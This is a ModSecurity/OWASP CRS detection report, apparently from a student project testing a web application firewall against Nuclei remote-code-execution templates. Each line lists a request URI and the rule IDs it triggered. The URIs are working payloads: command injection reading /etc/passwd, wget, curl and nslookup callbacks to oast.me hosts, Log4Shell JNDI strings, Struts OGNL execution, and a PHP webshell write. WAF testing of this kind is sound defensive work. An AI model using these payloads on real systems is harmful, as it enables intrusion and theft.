# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l rce.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/conf_predeterminada/web_estatica/owasp/opensource/nuclei/rce.clean
Packet [2]	Uri [/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27]	Nattacks [6 ]	Signatures	[932100]	[932110]	[942110]	[942150]	[942410]	[942431]
Packet [9]	Uri [/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd]	Nattacks [1 ]	Signatures	[930110]
Packet [14]	Uri [/web/tests/support/stores/test_grid_filter.php?query=phpinfo();]	Nattacks [1 ]	Signatures	[933160]
Packet [15]	Uri [/web/web.config.i18n.ashx?l=nuclei&v=nuclei]	Nattacks [1 ]	Signatures	[930130]
Packet [17]	Uri [/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60]	Nattacks [5 ]	Signatures	[930120]	[932100]	[932160]	[942110]	[942130]
Packet [22]	Uri [/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh]	Nattacks [1 ]	Signatures	[930110]
Packet [25]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [4 ]	Signatures	[932130]	[933160]	[942431]	[942460]
Packet [33]	Uri [/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27]	Nattacks [6 ]	Signatures	[932100]	[932110]	[942110]	[942150]	[942410]	[942431]
Packet [46]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [48]	Uri [/web/web.config.i18n.ashx?l=nuclei&v=nuclei]	Nattacks [1 ]	Signatures	[930130]
Packet [49]	Uri [/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60]	Nattacks [5 ]	Signatures	[930120]	[932100]	[932160]	[942110]	[942130]
Packet [56]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [6 ]	Signatures	[933100]	[933150]	[933160]	[942430]	[942431]	[942460]
Packet [57]	Uri [/web/pages/systemcall.php?command=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [64]	Uri [/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;]	Nattacks [8 ]	Signatures	[920272]	[921151]	[942200]	[942370]	[942430]	[942431]	[942460]	[942511]
Packet [65]	Uri [/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942110]	[942460]
Packet [72]	Uri [/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [75]	Uri [/web/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932110]	[932160]
Packet [76]	Uri [/web/guest_auth/poc.php?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [78]	Uri [/web/.%0d./.%0d./.%0d./.%0d./bin/sh]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [86]	Uri [/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [91]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [96]	Uri [/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5]	Nattacks [9 ]	Signatures	[933160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942460]	[942511]
Packet [97]	Uri [/web/hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c8ach799m8v918fkv9igcekcteeyyyyya.oast.me%22%29%7D__::.x/]	Nattacks [2 ]	Signatures	[933160]	[944130]
Packet [99]	Uri [/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942130]
Packet [101]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [6 ]	Signatures	[933100]	[933150]	[933160]	[942430]	[942431]	[942460]
Packet [103]	Uri [/web/pages/systemcall.php?command=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [108]	Uri [/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [109]	Uri [/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942110]	[942460]
Packet [110]	Uri [/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;]	Nattacks [8 ]	Signatures	[920272]	[921151]	[942200]	[942370]	[942430]	[942431]	[942460]	[942511]
Packet [115]	Uri [/web/seeyon/thirdpartyController.do.css/..;/ajax.do]	Nattacks [1 ]	Signatures	[930110]
Packet [119]	Uri [/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [121]	Uri [/web/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteeyyyyy6.oast.me%60]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [123]	Uri [/web/openam/oauth2/..;/ccversion/Version]	Nattacks [1 ]	Signatures	[930110]
Packet [129]	Uri [/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [130]	Uri [/web/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteoyyyybn.oast.me%60]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [131]	Uri [/web/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D]	Nattacks [15 ]	Signatures	[920220]	[920272]	[930120]	[932160]	[933160]	[941330]	[941340]	[942200]	[942330]	[942370]	[942430]	[942440]	[942431]	[942460]	[944130]
Packet [133]	Uri [/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;]	Nattacks [4 ]	Signatures	[931100]	[931130]	[932160]	[932190]
Packet [142]	Uri [/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1]	Nattacks [1 ]	Signatures	[933150]
Packet [169]	Uri [/web/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd]	Nattacks [11 ]	Signatures	[930120]	[932160]	[933160]	[933161]	[942430]	[942440]	[942431]	[944100]	[944110]	[944130]	[944250]
Packet [175]	Uri [/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]	Nattacks [2 ]	Signatures	[920271]	[920272]
Packet [180]	Uri [/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;]	Nattacks [4 ]	Signatures	[931100]	[931130]	[932160]	[932190]
Packet [188]	Uri [/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test]	Nattacks [2 ]	Signatures	[931130]	[932130]
Packet [191]	Uri [/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json]	Nattacks [2 ]	Signatures	[933160]	[942431]
Packet [197]	Uri [/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1]	Nattacks [1 ]	Signatures	[933150]
Packet [199]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [213]	Uri [/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23]	Nattacks [6 ]	Signatures	[920272]	[921150]	[930120]	[932160]	[933160]	[942370]
Packet [223]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [226]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [228]	Uri [/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064]	Nattacks [4 ]	Signatures	[920272]	[921151]	[932105]	[932150]
Packet [230]	Uri [/web/command.cgi?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [232]	Uri [/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]	Nattacks [2 ]	Signatures	[920271]	[920272]
Packet [233]	Uri [/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyyb4.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyybh.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]	Nattacks [2 ]	Signatures	[920271]	[920272]
Packet [237]	Uri [/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test]	Nattacks [2 ]	Signatures	[931130]	[932130]
Packet [241]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [242]	Uri [/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json]	Nattacks [2 ]	Signatures	[933160]	[942431]
Packet [244]	Uri [/web/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///]	Nattacks [2 ]	Signatures	[931130]	[942460]
Packet [247]	Uri [/web/ajax/networking/get_netcfg.php?iface=;curl%20http://c8ach799m8v918fkv9igcekctjyyyyynn.oast.me/`whoami`;]	Nattacks [6 ]	Signatures	[932100]	[932105]	[932110]	[932115]	[942110]	[942510]
Packet [250]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [261]	Uri [/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [264]	Uri [/web/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input]	Nattacks [2 ]	Signatures	[933120]	[933140]
ERROR->["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccess (144 characters omitted)"] [severity "4"] [ver "OWASP_CRS/3.2.0"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/3"] [hostname "127.0.0.1"] [uri "/web/devmode.action"] [unique_id "1652182624"] [ref "o0,42o0,42v49,257t:urlDecodeUni"]]
[msc_logdata] WARNING: Unknown field in log line [ModSecurity: Warning. Matched "Operator `Rx' with parameter `((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'\xc2\xb4\xe2\x80\x99\xe2\x80\x98`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'\xc2\xb4\xe2\x80\x99\xe2\x80\x98`<>]*?){6})' against variable `ARGS:expression' (Value: `(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork (157 characters omitted)' ) [file "/home/dit/Downloads/inspectorlog/etc/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "1521"] [id "942431"] [rev ""] [msg "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)"] [data "Matched Data: (#_memberAccess["allowStaticMethodAccess"] found within ARGS:expression: (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccess (144 characters omitted)"] [severity "4"] [ver "OWASP_CRS/3.2.0"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/3"] [hostname "127.0.0.1"] [uri "/web/devmode.action"] [unique_id "1652182624"] [ref "o0,42o0,42v49,257t:urlDecodeUni"]]
Packet [265]	Uri [/web/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))]	Nattacks [14 ]	Signatures	[930120]	[932160]	[933160]	[941340]	[942200]	[942370]	[942430]	[942440]	[942431]	[942460]	[944100]	[944110]	[944130]	[944250]
Packet [266]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [267]	Uri [/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22]	Nattacks [4 ]	Signatures	[932105]	[932115]	[942110]	[942431]
Packet [271]	Uri [/web/lucee/admin/imgProcess.cfm?file=/../../../context/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [272]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [274]	Uri [/web/cgi-bin/weblogin.cgi?username=admin';cat]	Nattacks [1 ]	Signatures	[942180]
Packet [276]	Uri [/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064]	Nattacks [4 ]	Signatures	[920272]	[921151]	[932105]	[932150]
Packet [286]	Uri [/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[932100]	[942460]
Packet [288]	Uri [/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064]	Nattacks [2 ]	Signatures	[920272]	[921151]
Packet [299]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [301]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8ach799m8v918fkv9igcekctjeyyyynw.oast.me/a%7D]	Nattacks [5 ]	Signatures	[932110]	[932130]	[932160]	[942431]	[942460]
Packet [306]	Uri [/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything]	Nattacks [3 ]	Signatures	[932105]	[932130]	[932150]
Packet [309]	Uri [/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [310]	Uri [/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22]	Nattacks [4 ]	Signatures	[932105]	[932115]	[942110]	[942431]
Packet [315]	Uri [/web/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27]	Nattacks [11 ]	Signatures	[920272]	[921151]	[932105]	[932150]	[932160]	[942110]	[942260]	[942330]	[942430]	[942440]	[942431]
Packet [329]	Uri [/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064]	Nattacks [2 ]	Signatures	[920272]	[921151]
Packet [330]	Uri [/web/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c8ach799m8v918fkv9igcekctjoyyyynh.oast.me%27);//]	Nattacks [7 ]	Signatures	[933160]	[933161]	[942120]	[942430]	[942431]	[942460]	[942511]
Packet [343]	Uri [/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything]	Nattacks [3 ]	Signatures	[932105]	[932130]	[932150]
Packet [344]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [2 ]	Signatures	[933160]	[944130]
Packet [349]	Uri [/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [351]	Uri [/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1]	Nattacks [3 ]	Signatures	[930120]	[932160]	[933150]
Packet [356]	Uri [/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}]	Nattacks [5 ]	Signatures	[932110]	[932130]	[932160]	[942431]	[942460]
Packet [357]	Uri [/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D]	Nattacks [20 ]	Signatures	[920220]	[920272]	[930120]	[932100]	[932110]	[932160]	[941330]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942460]	[942511]	[944100]	[944110]	[944120]	[944130]
Packet [358]	Uri [/web/infusions/downloads/downloads.php?cat_id=${system(ls)}]	Nattacks [2 ]	Signatures	[932130]	[933160]
Packet [359]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [363]	Uri [/web/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;]	Nattacks [8 ]	Signatures	[942190]	[942360]	[942110]	[942260]	[942340]	[942361]	[942480]	[942511]
Packet [365]	Uri [/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942120]
Packet [366]	Uri [/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D]	Nattacks [11 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942200]	[942260]	[942430]	[942490]	[942431]	[942460]
Packet [383]	Uri [/web/?action=command&command=set_city_timezone&value=$(wget%20http://c8ach799m8v918fkv9igcekctkyyyyygn.oast.me))]	Nattacks [3 ]	Signatures	[932105]	[932130]	[932150]
Packet [392]	Uri [/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
